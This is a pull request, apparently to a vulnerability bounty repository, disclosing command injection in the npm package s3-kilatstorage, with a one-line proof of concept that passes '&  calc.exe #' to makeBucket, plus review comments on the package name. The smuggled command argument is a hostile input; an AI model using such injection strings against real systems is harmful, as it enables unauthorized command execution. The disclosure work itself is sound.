### PR TITLE
Command Injection s3-kilatstorage

### PR DESCRIPTION
**Pull request by tanimuzair**
## ✍️ Description

`s3-kilatstorage` is vulnerable to `Command Injection`.

## 🕵️‍♂️ Proof of Concept

Create the below file:

```
var a = require("s3-kilatstorage");
a.makeBucket("&  calc.exe #");
```
## Install the package and run it:
```
npm i s3-kilatstorage
```
```
node poc.js
```

## 💥 Impact

Command Injection

## ✅ Checklist

**In my pull request, I have:**

- [x] Created and populated the `README.md` and `vulnerability.json` files
- [x] Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))
- [x] Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))
- [x] Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
- [x] Checked that the vulnerability affects the latest version of the package released
- [x] Checked that a fix does not currently exist that remediates this vulnerability
- [x] Complied with all applicable laws

### CODE REVIEW

**Comment by tanimuzair** [comment]
Please let me know, how to fix the PR. I will make the necessary amendment.

File: bounties/npm/s3-kilatstorage/1/vulnerability.json [hunk 1]
```diff
@@ -0,0 +1,55 @@
...
+    "DisclosureDate": "2021-01-26",
+    "AffectedVersionRange": "*",
+    "Summary": "Command Injection",
+    "Contributor": {
+        "Discloser": "tanimuzair",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "KilatStorages3",
```
Comment (JamieSlome) [inline bounties/npm/s3-kilatstorage/1/vulnerability.json:12]: This needs to match the exact name of the `npm` package.

Comment (tanimuzair) [reply bounties/npm/s3-kilatstorage/1/vulnerability.json]: Thank you. That worked.

**Comment by arjunshibu** [comment]
Hi @tanimuzair the repository is `archived/read-only` 😢

**Pull request merged**